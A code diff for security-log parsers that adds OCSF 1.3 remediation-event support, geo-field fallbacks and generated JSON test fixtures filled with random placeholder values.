a882c2ac5..bb5831a9c 100644 --- a/Netskope/netskope_events/tests/test_user_alert.json +++ b/Netskope/netskope_events/tests/test_user_alert.json @@ -17,6 +17,9 @@ ] }, "@timestamp": "2022-12-21T14:52:01Z", + "action": { + "name": "useralert" + }, "destination": { "address": "108.128.91.183", "bytes": 0, diff --git a/OCSF/ocsf/_meta/manifest.yml b/OCSF/ocsf/_meta/manifest.yml index 33f57ccd3..94a2c41b4 100644 --- a/OCSF/ocsf/_meta/manifest.yml +++ b/OCSF/ocsf/_meta/manifest.yml @@ -6,7 +6,7 @@ slug: ocsf description: >- The Open Cybersecurity Schema Framework is an open-source project, delivering an extensible framework for developing schemas, along with a vendor-agnostic core security schema. - Supported version: **1.1** + Supported version: **1.3** data_sources: File monitoring: OCSF allows collecting system activities diff --git a/OCSF/ocsf/_meta/smart-descriptions.json b/OCSF/ocsf/_meta/smart-descriptions.json index d03bc41fb..6947b5762 100644 --- a/OCSF/ocsf/_meta/smart-descriptions.json +++ b/OCSF/ocsf/_meta/smart-descriptions.json @@ -928,5 +928,49 @@ "field": "ocsf.activity_name" } ] + }, + { + "value": "File Remediation Activity: {ocsf.activity_name} file {file.name}", + "conditions": [ + { + "field": "ocsf.class_uid", + "value": 7002 + }, + { + "field": "ocsf.activity_name" + }, + { + "field": "file.name" + } + ] + }, + { + "value": "Process Remediation Activity: {ocsf.activity_name} file {file.name} by process {process.name}", + "conditions": [ + { + "field": "ocsf.class_uid", + "value": 7003 + }, + { + "field": "ocsf.activity_name" + }, + { + "field": "file.name" + }, + { + "field": "process.name" + } + ] + }, + { + "value": "{ocsf.class_name}: {ocsf.activity_name}", + "conditions": [ + { + "field": "ocsf.class_name" + }, + { + "field": "ocsf.activity_name" + } + ] } ] diff --git a/OCSF/ocsf/ingest/parser.yml b/OCSF/ocsf/ingest/parser.yml index 765a6a76d..3f88ce24c 100644 --- a/OCSF/ocsf/ingest/parser.yml +++ b/OCSF/ocsf/ingest/parser.yml @@ -79,16 +79,16 @@ pipeline: - name: set_common_fields - name: pipeline_object_actor - filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,2002,2003,2004,2006,3001,3002,3003,3004,3005,3006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,5001,5002,5003,5006,5007,5008,5009,5010,5011,5012,5013,5014,5015,5016,5017,5018,5019,6001,6002,6003,6004,6005,6006,6007,201001,201002,201003,205004,205005,205019,99901006,99903001,99904001,99904002,99904009,99904010,99936001,99936002,99937002] and parse_event.message.get('actor') != None }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,2002,2003,2004,2006,3001,3002,3003,3004,3005,3006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,5001,5002,5003,5006,5007,5008,5009,5010,5011,5012,5013,5014,5015,5016,5017,5018,5019,5020,6001,6002,6003,6004,6005,6006,6007,201001,201002,201003,201004,205004,205005,205019,99901006,99903001,99904001,99904002,99904009,99904010,99936001,99936002,99937002] and parse_event.message.get('actor') != None }}" - name: pipeline_object_attack - filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,2001,2004,2005,2006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,6001,6005,201001,201002,201003,99901006,99902003,99904001,99904002,99904009,99904010] and parse_event.message.get('attacks') != None }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1009,1010,2001,2004,2005,2006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,6001,6005,201001,201002,201003,99901006,99902003,99904001,99904002,99904009,99904010] and parse_event.message.get('attacks') != None }}" - name: pipeline_object_network_connection_info - filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [4001,4002,4003,4004,4005,4006,4007,4008,4010,4013,4014,5012,6006,99904009,99904010,99931006,99932007,99933005] and parse_event.message.get('connection_info') != None }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [4001,4002,4003,4004,4005,4006,4007,4008,4010,4013,4014,5012,6006,7004,99904009,99904010,99931006,99932007,99933005] and parse_event.message.get('connection_info') != None }}" - name: pipeline_object_device - filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,2002,2003,2004,2006,3001,3002,3003,3004,3005,3006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,5001,5002,5004,5006,5007,5008,5009,5010,5011,5012,5013,5014,5015,5016,5017,5018,5019,6001,6002,6004,6007,201001,201002,201003,205004,205005,205019,99901006,99903001,99904001,99904002,99904009,99904010,99936001,99936002] and parse_event.message.get('device') != None }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,2002,2003,2004,2006,3001,3002,3003,3004,3005,3006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,5001,5002,5004,5006,5007,5008,5009,5010,5011,5012,5013,5014,5015,5016,5017,5018,5019,5020,6001,6002,6004,6007,201001,201002,201003,201004,205004,205005,205019,99901006,99903001,99904001,99904002,99904009,99904010,99936001,99936002] and parse_event.message.get('device') != None }}" - name: pipeline_object_http_request filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [3001,3002,3003,3004,3005,3006,4002,6001,6003,6004,6005,99937002,99938001] and parse_event.message.get('http_request') != None }}" @@ -100,7 +100,7 @@ pipeline: filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1008,2006,3001,3002,3003,3004,3005,3006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4013,4014,6001,6003,6004,6005,6006,99904009,99904010,99937002,99938001] and parse_event.message.get('dst_endpoint') != None or parse_event.message.get('src_endpoint') != None }}" - name: pipeline_object_process - filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1004,1007,2001,5011,5012,5015,99932006,99932007,99932011,99933006,99934001,99935002] and parse_event.message.get('process') != None }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1004,1007,2001,5011,5012,5015,7003,99932006,99932007,99932011,99933006,99934001,99935002] and parse_event.message.get('process') != None }}" - name: pipeline_object_proxy filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [3006,4001,4002,4003,4004,4005,4006,4007,4008,4010,4013,4014,6004,99904009,99904010] and parse_event.message.get('proxy') != None }}" @@ -115,7 +115,7 @@ pipeline: filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [3001,3002,3003,3005,3006,4014,5003,5018,99932017] and parse_event.message.get('user') != None }}" - name: pipeline_object_file - filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1008,2006,4002,4005,4006,4007,4008,4010,4011,5007,6006,99901006,99903001,99904001,99931004,99931007,99931010,99932001,99933000] and parse_event.message.get('file') != None }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1008,2006,4002,4005,4006,4007,4008,4010,4011,5007,6006,7002,99901006,99903001,99904001,99931004,99931007,99931010,99932001,99933000] and parse_event.message.get('file') != None }}" - name: pipeline_object_system_activity_helper filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1002,1005,1006,1007,5010,5011,99932004,99932006,99933002,99933004] }}" @@ -454,8 +454,8 @@ stages: host.geo.city_name: "{{ parse_event.message.device.location.city }}" host.geo.continent_name: "{{ parse_event.message.device.location.continent }}" host.geo.country_iso_code: "{{ parse_event.message.device.location.country }}" - host.geo.location.lon: "{{ parse_event.message.device.location.coordinates[0] }}" - host.geo.location.lat: "{{ parse_event.message.device.location.coordinates[1] }}" + host.geo.location.lon: "{{ parse_event.message.device.location.coordinates[0] or parse_event.message.device.location.long }}" + host.geo.location.lat: "{{ parse_event.message.device.location.coordinates[1] or parse_event.message.device.location.lat }}" host.geo.name: "{{ parse_event.message.device.location.desc }}" host.geo.postal_code: "{{ parse_event.message.device.location.postal_code }}" host.geo.region_iso_code: "{{ parse_event.message.device.location.region }}" @@ -534,7 +534,8 @@ stages: - set: source.geo.city_name: "{{ parse_event.message.src_endpoint.location.city }}" source.geo.continent_name: "{{ parse_event.message.src_endpoint.location.continent }}" - source.geo.location: "{{ parse_event.message.src_endpoint.location.coordinates }}" + source.geo.location.lon: "{{ parse_event.message.src_endpoint.location.coordinates[0] or parse_event.message.src_endpoint.location.long }}" + source.geo.location.lat: "{{ parse_event.message.src_endpoint.location.coordinates[1] or parse_event.message.src_endpoint.location.lat }}" source.geo.country_iso_code: "{{ parse_event.message.src_endpoint.location.country }}" source.geo.name: "{{ parse_event.message.src_endpoint.location.desc }}" source.geo.postal_code: "{{ parse_event.message.src_endpoint.location.postal_code }}" @@ -557,8 +558,8 @@ stages: - set: destination.geo.city_name: "{{ parse_event.message.dst_endpoint.location.city }}" destination.geo.continent_name: "{{ parse_event.message.dst_endpoint.location.continent }}" - destination.geo.location.lon: "{{ parse_event.message.dst_endpoint.location.coordinates[0] }}" - destination.geo.location.lat: "{{ parse_event.message.dst_endpoint.location.coordinates[1] }}" + destination.geo.location.lon: "{{ parse_event.message.dst_endpoint.location.coordinates[0] or parse_event.message.dst_endpoint.location.long }}" + destination.geo.location.lat: "{{ parse_event.message.dst_endpoint.location.coordinates[1] or parse_event.message.dst_endpoint.location.lat }}" destination.geo.country_iso_code: "{{ parse_event.message.dst_endpoint.location.country }}" destination.geo.name: "{{ parse_event.message.dst_endpoint.location.desc }}" destination.geo.postal_code: "{{ parse_event.message.dst_endpoint.location.postal_code }}" @@ -567,9 +568,11 @@ stages: destination.domain: "{{ parse_event.message.dst_endpoint.hostname }}" filter: "{{ parse_event.message.dst_endpoint.get('hostname') != None }}" - set: - destination.ip: "{{ parse_event.message.dst_endpoint.ip }}" destination.mac: "{{ parse_event.message.dst_endpoint.mac }}" destination.port: "{{ parse_event.message.dst_endpoint.port }}" + - set: + destination.ip: "{{ parse_event.message.dst_endpoint.ip }}" + filter: "{{ parse_event.message.dst_endpoint.ip | is_ipaddress }}" - set: network.application: "{{ parse_event.message.dst_endpoint.svc_name }}" filter: "{{ parse_event.message.dst_endpoint.get('svc_name') != None }}" diff --git a/OCSF/ocsf/tests/generated_file_remediation_activity_1.json b/OCSF/ocsf/tests/generated_file_remediation_activity_1.json new file mode 100644 index 000000000..29fe10f1c --- /dev/null +++ b/OCSF/ocsf/tests/generated_file_remediation_activity_1.json @@ -0,0 +1,39 @@ +{ + "input": { + "message": "{\"status\": \"Does Not Exist\", \"time\": 1731328594225, \"file\": {\"name\": \"html.pkg\", \"type\": \"Local Socket\", \"version\": \"1.3.0\", \"path\": \"canyon upgrading wool/marco.fla/html.pkg\", \"ext\": \"honest borough graduated\", \"type_id\": 5, \"mime_type\": \"pr/anything\", \"parent_folder\": \"canyon upgrading wool/marco.fla\", \"confidentiality\": \"prisoner fought submission\", \"hashes\": [{\"value\": \"BDD5C7FF933889BB4DE51943D295A2C3BF3CCE0EE5D7196DB36A7B734E44B9478FE798F4A6E72C0FB13B30746C0434F713614EBDB498B03029382CF837E23878\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}], \"xattributes\": {}}, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"older bangladesh caused\", \"version\": \"1.3.0\", \"lang\": \"en\", \"cpe_name\": \"m ryan proof\", \"url_string\": \"web\", \"vendor_name\": \"directed villas incorrect\"}, \"labels\": [\"range\", \"mild\"], \"profiles\": [], \"event_code\": \"ethnic\", \"log_name\": \"wisconsin scenes croatia\", \"log_provider\": \"consolidated month mil\", \"logged_time\": 1731328594209, \"loggers\": [{\"name\": \"generated dale subsection\", \"version\": \"1.3.0\", \"device\": {\"owner\": {\"name\": \"Chapter\", \"type\": \"User\", \"uid\": \"95fb04dc-a029-11ef-9566-0242ac110007\", \"type_id\": 1, \"risk_level\": \"Info\", \"risk_level_id\": 0}, \"type\": \"IOT\", \"os\": {\"name\": \"polls knew problem\", \"type\": \"Windows\", \"type_id\": 100, \"cpe_name\": \"architects letting hay\"}, \"desc\": \"tradition automated mysql\", \"hostname\": \"meters.edu\", \"uid\": \"95faf0a0-a029-11ef-a3c0-0242ac110007\", \"image\": {\"name\": \"ace tracy webshots\", \"path\": \"joined also europe\", \"uid\": \"95fbbb16-a029-11ef-9965-0242ac110007\"}, \"groups\": [{\"uid\": \"95faa5fa-a029-11ef-b64e-0242ac110007\"}], \"type_id\": 7, \"imei\": \"summary ieee rated\", \"interface_name\": \"marsh shopper guides\", \"interface_uid\": \"95fa9074-a029-11ef-931d-0242ac110007\", \"region\": \"accepting sword tab\", \"risk_level\": \"High\", \"risk_level_id\": 3, \"risk_score\": 4, \"zone\": \"ability footage nt\"}, \"product\": {\"name\": \"quote licence channel\", \"version\": \"1.3.0\", \"uid\": \"95fc351e-a029-11ef-87b2-0242ac110007\", \"feature\": {\"name\": \"adequate drainage dear\", \"version\": \"1.3.0\", \"uid\": \"95fc4cd4-a029-11ef-9a35-0242ac110007\"}, \"url_string\": \"makes\", \"vendor_name\": \"hybrid licensing faster\"}, \"uid\": \"95fc5602-a029-11ef-9902-0242ac110007\", \"log_name\": \"vegas cave greatly\", \"log_provider\": \"ieee cancer pharmaceuticals\", \"logged_time\": 1731328594222}, {\"name\": \"hostels given kill\", \"version\": \"1.3.0\", \"product\": {\"name\": \"css ks demonstrate\", \"version\": \"1.3.0\", \"uid\": \"95fc6b06-a029-11ef-b5a5-0242ac110007\", \"lang\": \"en\", \"url_string\": \"alternatives\", \"vendor_name\": \"television preventing blades\"}, \"uid\": \"95fc72c2-a029-11ef-994a-0242ac110007\", \"log_provider\": \"alignment free mines\", \"logged_time\": 1731328594222}], \"original_time\": \"drill blogs lemon\", \"processed_time\": 1731328594222, \"tenant_uid\": \"95fc7d12-a029-11ef-bfaa-0242ac110007\"}, \"severity\": \"illustrations\", \"duration\": 559843632, \"category_uid\": 7, \"activity_id\": 2, \"type_uid\": 700202, \"type_name\": \"File Remediation Activity: Evict\", \"observables\": [{\"name\": \"chen architects purchased\", \"type\": \"File\", \"type_id\": 24}, {\"name\": \"controlling sublime bp\", \"type\": \"URL String\", \"type_id\": 6}], \"category_name\": \"Remediation\", \"class_uid\": 7002, \"class_name\": \"File Remediation Activity\", \"timezone_offset\": 58, \"activity_name\": \"Evict\", \"command_uid\": \"95fcdc6c-a029-11ef-acb7-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"95fc9ff4-a029-11ef-8605-0242ac110007\"}, \"d3f_technique\": {\"name\": \"determine wanting pursuant\"}}, {\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"95fcb016-a029-11ef-9ed4-0242ac110007\"}, \"d3f_technique\": {\"name\": \"cw drama their\", \"uid\": \"95fcbd7c-a029-11ef-ba3c-0242ac110007\", \"src_url\": \"organize\"}}], \"enrichments\": [{\"data\": \"cluster\", \"name\": \"settlement ia sega\", \"type\": \"surfaces registrar sizes\", \"value\": \"seq excuse nearest\", \"created_time\": 1731328594225, \"provider\": \"lesson prev champion\", \"reputation\": {\"base_score\": 15.2963, \"provider\": \"northern prep older\", \"score\": \"May not be Safe\", \"score_id\": 5}, \"short_desc\": \"travel glasses agencies\", \"src_url\": \"fly\"}, {\"data\": \"mpegs\", \"name\": \"mentor glasgow mistress\", \"type\": \"email newest household\", \"value\": \"vpn tape med\", \"created_time\": 1731328594225, \"short_desc\": \"anything fatty capital\", \"src_url\": \"saint\"}], \"severity_id\": 99, \"status_detail\": \"mistake schedule propecia\", \"status_id\": 3}" + }, + "expected": { + "message": "{\"status\": \"Does Not Exist\", \"time\": 1731328594225, \"file\": {\"name\": \"html.pkg\", \"type\": \"Local Socket\", \"version\": \"1.3.0\", \"path\": \"canyon upgrading wool/marco.fla/html.pkg\", \"ext\": \"honest borough graduated\", \"type_id\": 5, \"mime_type\": \"pr/anything\", \"parent_folder\": \"canyon upgrading wool/marco.fla\", \"confidentiality\": \"prisoner fought submission\", \"hashes\": [{\"value\": \"BDD5C7FF933889BB4DE51943D295A2C3BF3CCE0EE5D7196DB36A7B734E44B9478FE798F4A6E72C0FB13B30746C0434F713614EBDB498B03029382CF837E23878\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}], \"xattributes\": {}}, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"older bangladesh caused\", \"version\": \"1.3.0\", \"lang\": \"en\", \"cpe_name\": \"m ryan proof\", \"url_string\": \"web\", \"vendor_name\": \"directed villas incorrect\"}, \"labels\": [\"range\", \"mild\"], \"profiles\": [], \"event_code\": \"ethnic\", \"log_name\": \"wisconsin scenes croatia\", \"log_provider\": \"consolidated month mil\", \"logged_time\": 1731328594209, \"loggers\": [{\"name\": \"generated dale subsection\", \"version\": \"1.3.0\", \"device\": {\"owner\": {\"name\": \"Chapter\", \"type\": \"User\", \"uid\": \"95fb04dc-a029-11ef-9566-0242ac110007\", \"type_id\": 1, \"risk_level\": \"Info\", \"risk_level_id\": 0}, \"type\": \"IOT\", \"os\": {\"name\": \"polls knew problem\", \"type\": \"Windows\", \"type_id\": 100, \"cpe_name\": \"architects letting hay\"}, \"desc\": \"tradition automated mysql\", \"hostname\": \"meters.edu\", \"uid\": \"95faf0a0-a029-11ef-a3c0-0242ac110007\", \"image\": {\"name\": \"ace tracy webshots\", \"path\": \"joined also europe\", \"uid\": \"95fbbb16-a029-11ef-9965-0242ac110007\"}, \"groups\": [{\"uid\": \"95faa5fa-a029-11ef-b64e-0242ac110007\"}], \"type_id\": 7, \"imei\": \"summary ieee rated\", \"interface_name\": \"marsh shopper guides\", \"interface_uid\": \"95fa9074-a029-11ef-931d-0242ac110007\", \"region\": \"accepting sword tab\", \"risk_level\": \"High\", \"risk_level_id\": 3, \"risk_score\": 4, \"zone\": \"ability footage nt\"}, \"product\": {\"name\": \"quote licence channel\", \"version\": \"1.3.0\", \"uid\": \"95fc351e-a029-11ef-87b2-0242ac110007\", \"feature\": {\"name\": \"adequate drainage dear\", \"version\": \"1.3.0\", \"uid\": \"95fc4cd4-a029-11ef-9a35-0242ac110007\"}, \"url_string\": \"makes\", \"vendor_name\": \"hybrid licensing faster\"}, \"uid\": \"95fc5602-a029-11ef-9902-0242ac110007\", \"log_name\": \"vegas cave greatly\", \"log_provider\": \"ieee cancer pharmaceuticals\", \"logged_time\": 1731328594222}, {\"name\": \"hostels given kill\", \"version\": \"1.3.0\", \"product\": {\"name\": \"css ks demonstrate\", \"version\": \"1.3.0\", \"uid\": \"95fc6b06-a029-11ef-b5a5-0242ac110007\", \"lang\": \"en\", \"url_string\": \"alternatives\", \"vendor_name\": \"television preventing blades\"}, \"uid\": \"95fc72c2-a029-11ef-994a-0242ac110007\", \"log_provider\": \"alignment free mines\", \"logged_time\": 1731328594222}], \"original_time\": \"drill blogs lemon\", \"processed_time\": 1731328594222, \"tenant_uid\": \"95fc7d12-a029-11ef-bfaa-0242ac110007\"}, \"severity\": \"illustrations\", \"duration\": 559843632, \"category_uid\": 7, \"activity_id\": 2, \"type_uid\": 700202, \"type_name\": \"File Remediation Activity: Evict\", \"observables\": [{\"name\": \"chen architects purchased\", \"type\": \"File\", \"type_id\": 24}, {\"name\": \"controlling sublime bp\", \"type\": \"URL String\", \"type_id\": 6}], \"category_name\": \"Remediation\", \"class_uid\": 7002, \"class_name\": \"File Remediation Activity\", \"timezone_offset\": 58, \"activity_name\": \"Evict\", \"command_uid\": \"95fcdc6c-a029-11ef-acb7-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"95fc9ff4-a029-11ef-8605-0242ac110007\"}, \"d3f_technique\": {\"name\": \"determine wanting pursuant\"}}, {\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"95fcb016-a029-11ef-9ed4-0242ac110007\"}, \"d3f_technique\": {\"name\": \"cw drama their\", \"uid\": \"95fcbd7c-a029-11ef-ba3c-0242ac110007\", \"src_url\": \"organize\"}}], \"enrichments\": [{\"data\": \"cluster\", \"name\": \"settlement ia sega\", \"type\": \"surfaces registrar sizes\", \"value\": \"seq excuse nearest\", \"created_time\": 1731328594225, \"provider\": \"lesson prev champion\", \"reputation\": {\"base_score\": 15.2963, \"provider\": \"northern prep older\", \"score\": \"May not be Safe\", \"score_id\": 5}, \"short_desc\": \"travel glasses agencies\", \"src_url\": \"fly\"}, {\"data\": \"mpegs\", \"name\": \"mentor glasgow mistress\", \"type\": \"email newest household\", \"value\": \"vpn tape med\", \"created_time\": 1731328594225, \"short_desc\": \"anything fatty capital\", \"src_url\": \"saint\"}], \"severity_id\": 99, \"status_detail\": \"mistake schedule propecia\", \"status_id\": 3}", + "event": { + "action": "evict", + "category": [], + "code": "ethnic", + "duration": 559843632000000, + "provider": "consolidated month mil", + "severity": 99, + "type": [] + }, + "@timestamp": "2024-11-11T12:36:34.225000Z", + "file": { + "directory": "canyon upgrading wool/marco.fla", + "hash": { + "ssdeep": "BDD5C7FF933889BB4DE51943D295A2C3BF3CCE0EE5D7196DB36A7B734E44B9478FE798F4A6E72C0FB13B30746C0434F713614EBDB498B03029382CF837E23878" + }, + "mime_type": "pr/anything", + "name": "html.pkg", + "path": "canyon upgrading wool/marco.fla/html.pkg", + "type": "Local Socket" + }, + "ocsf": { + "activity_id": 2, + "activity_name": "Evict", + "class_name": "File Remediation Activity", + "class_uid": 7002 + }, + "related": { + "hash": [ + "BDD5C7FF933889BB4DE51943D295A2C3BF3CCE0EE5D7196DB36A7B734E44B9478FE798F4A6E72C0FB13B30746C0434F713614EBDB498B03029382CF837E23878" + ] + } + } +} \ No newline at end of file diff --git a/OCSF/ocsf/tests/generated_file_remediation_activity_2.json b/OCSF/ocsf/tests/generated_file_remediation_activity_2.json new file mode 100644 index 000000000..9af77e1ab --- /dev/null +++ b/OCSF/ocsf/tests/generated_file_remediation_activity_2.json @@ -0,0 +1,39 @@ +{ + "input": { + "message": "{\"message\": \"oils tissue non\", \"status\": \"bottle threads desktop\", \"time\": 1731328621430, \"file\": {\"attributes\": 77, \"name\": \"panama.jsp\", \"type\": \"Unknown\", \"version\": \"1.3.0\", \"path\": \"sage petite tracy/supplement.deskthemepack/panama.jsp\", \"signature\": {\"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": false, \"issuer\": \"shaw further heaven\", \"fingerprints\": [{\"value\": \"25CF2FBFB6A4C58B9886BFD82A9D9D32976450F5B95B193B1F8F91071FCE9032\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"created_time\": 1731328621426, \"expiration_time\": 1731328621426, \"serial_number\": \"museum every fa\"}, \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, \"desc\": \"sims faculty argue\", \"uid\": \"a6338964-a029-11ef-9cb6-0242ac110007\", \"type_id\": 0, \"parent_folder\": \"sage petite tracy/supplement.deskthemepack\", \"accessed_time\": 1731328621427, \"hashes\": [{\"value\": \"1051E22C1288CD1DD4B35D7D119F9D9E764B37C2050E8086C3F8AADBE48E8459\", \"algorithm\": \"magic\", \"algorithm_id\": 99}, {\"value\": \"2A598E60AFB25F3005C1949A4AE28E75A5E24C34375D709852748D46D50E19DBF4AD93722613E77084B214B0C8F931F2EFF7B1AA9AF17B97F3D50770D0C328DB\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"xattributes\": {}}, \"metadata\": {\"version\": \"1.3.0\", \"extension\": {\"name\": \"determine italia plenty\", \"version\": \"1.3.0\", \"uid\": \"a6331254-a029-11ef-a2ea-0242ac110007\"}, \"product\": {\"name\": \"board actor feels\", \"version\": \"1.3.0\", \"uid\": \"a6334788-a029-11ef-8ba2-0242ac110007\", \"vendor_name\": \"resume himself vitamin\"}, \"uid\": \"a63350e8-a029-11ef-91d8-0242ac110007\", \"profiles\": [], \"correlation_uid\": \"a63357c8-a029-11ef-a1d1-0242ac110007\", \"log_name\": \"movements amazing murphy\", \"log_provider\": \"suggests assure sacred\", \"original_time\": \"narrative shed quit\", \"tenant_uid\": \"a63361a0-a029-11ef-b41a-0242ac110007\"}, \"severity\": \"Medium\", \"category_uid\": 7, \"activity_id\": 4, \"type_uid\": 700204, \"type_name\": \"File Remediation Activity: Harden\", \"observables\": [{\"name\": \"font earlier construction\", \"type\": \"Hash\", \"type_id\": 8}, {\"name\": \"outdoors de otherwise\", \"type\": \"Unknown\", \"type_id\": 0}], \"category_name\": \"Remediation\", \"class_uid\": 7002, \"class_name\": \"File Remediation Activity\", \"timezone_offset\": 94, \"activity_name\": \"Harden\", \"command_uid\": \"a6340542-a029-11ef-ab83-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"a633df68-a029-11ef-b6df-0242ac110007\"}, \"d3f_technique\": {\"name\": \"tgp adrian reject\", \"uid\": \"a633ef26-a029-11ef-ae66-0242ac110007\", \"src_url\": \"productions\"}}], \"severity_id\": 3, \"status_code\": \"lover\", \"status_detail\": \"declared chassis nominations\"}" + }, + "expected": { + "message": "{\"message\": \"oils tissue non\", \"status\": \"bottle threads desktop\", \"time\": 1731328621430, \"file\": {\"attributes\": 77, \"name\": \"panama.jsp\", \"type\": \"Unknown\", \"version\": \"1.3.0\", \"path\": \"sage petite tracy/supplement.deskthemepack/panama.jsp\", \"signature\": {\"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": false, \"issuer\": \"shaw further heaven\", \"fingerprints\": [{\"value\": \"25CF2FBFB6A4C58B9886BFD82A9D9D32976450F5B95B193B1F8F91071FCE9032\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"created_time\": 1731328621426, \"expiration_time\": 1731328621426, \"serial_number\": \"museum every fa\"}, \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, \"desc\": \"sims faculty argue\", \"uid\": \"a6338964-a029-11ef-9cb6-0242ac110007\", \"type_id\": 0, \"parent_folder\": \"sage petite tracy/supplement.deskthemepack\", \"accessed_time\": 1731328621427, \"hashes\": [{\"value\": \"1051E22C1288CD1DD4B35D7D119F9D9E764B37C2050E8086C3F8AADBE48E8459\", \"algorithm\": \"magic\", \"algorithm_id\": 99}, {\"value\": \"2A598E60AFB25F3005C1949A4AE28E75A5E24C34375D709852748D46D50E19DBF4AD93722613E77084B214B0C8F931F2EFF7B1AA9AF17B97F3D50770D0C328DB\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"xattributes\": {}}, \"metadata\": {\"version\": \"1.3.0\", \"extension\": {\"name\": \"determine italia plenty\", \"version\": \"1.3.0\", \"uid\": \"a6331254-a029-11ef-a2ea-0242ac110007\"}, \"product\": {\"name\": \"board actor feels\", \"version\": \"1.3.0\", \"uid\": \"a6334788-a029-11ef-8ba2-0242ac110007\", \"vendor_name\": \"resume himself vitamin\"}, \"uid\": \"a63350e8-a029-11ef-91d8-0242ac110007\", \"profiles\": [], \"correlation_uid\": \"a63357c8-a029-11ef-a1d1-0242ac110007\", \"log_name\": \"movements amazing murphy\", \"log_provider\": \"suggests assure sacred\", \"original_time\": \"narrative shed quit\", \"tenant_uid\": \"a63361a0-a029-11ef-b41a-0242ac110007\"}, \"severity\": \"Medium\", \"category_uid\": 7, \"activity_id\": 4, \"type_uid\": 700204, \"type_name\": \"File Remediation Activity: Harden\", \"observables\": [{\"name\": \"font earlier construction\", \"type\": \"Hash\", \"type_id\": 8}, {\"name\": \"outdoors de otherwise\", \"type\": \"Unknown\", \"type_id\": 0}], \"category_name\": \"Remediation\", \"class_uid\": 7002, \"class_name\": \"File Remediation Activity\", \"timezone_offset\": 94, \"activity_name\": \"Harden\", \"command_uid\": \"a6340542-a029-11ef-ab83-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"a633df68-a029-11ef-b6df-0242ac110007\"}, \"d3f_technique\": {\"name\": \"tgp adrian reject\", \"uid\": \"a633ef26-a029-11ef-ae66-0242ac110007\", \"src_url\": \"productions\"}}], \"severity_id\": 3, \"status_code\": \"lover\", \"status_detail\": \"declared chassis nominations\"}", + "event": { + "action": "harden", + "category": [], + "provider": "suggests assure sacred", + "reason": "oils tissue non", + "severity": 3, + "type": [] + }, + "@timestamp": "2024-11-11T12:37:01.430000Z", + "file": { + "accessed": "2024-11-11T12:37:01.427000Z", + "directory": "sage petite tracy/supplement.deskthemepack", + "inode": "a6338964-a029-11ef-9cb6-0242ac110007", + "name": "panama.jsp", + "path": "sage petite tracy/supplement.deskthemepack/panama.jsp", + "type": "Unknown", + "x509": { + "issuer": { + "distinguished_name": "shaw further heaven" + }, + "not_after": "2024-11-11T12:37:01.426000Z", + "serial_number": "museum every fa", + "version_number": "1.3.0" + } + }, + "ocsf": { + "activity_id": 4, + "activity_name": "Harden", + "class_name": "File Remediation Activity", + "class_uid": 7002 + } + } +} \ No newline at end of file diff --git a/OCSF/ocsf/tests/generated_file_remediation_activity_3.json b/OCSF/ocsf/tests/generated_file_remediation_activity_3.json new file mode 100644 index 000000000..35f27d49f --- /dev/null +++ b/OCSF/ocsf/tests/generated_file_remediation_activity_3.json @@ -0,0 +1,43 @@ +{ + "input": { + "message": "{\"message\": \"baker testimonials approx\", \"status\": \"Error\", \"time\": 1731328627583, \"file\": {\"attributes\": 65, \"name\": \"brazilian.tar.gz\", \"owner\": {\"name\": \"Enrolled\", \"type\": \"Unknown\", \"uid\": 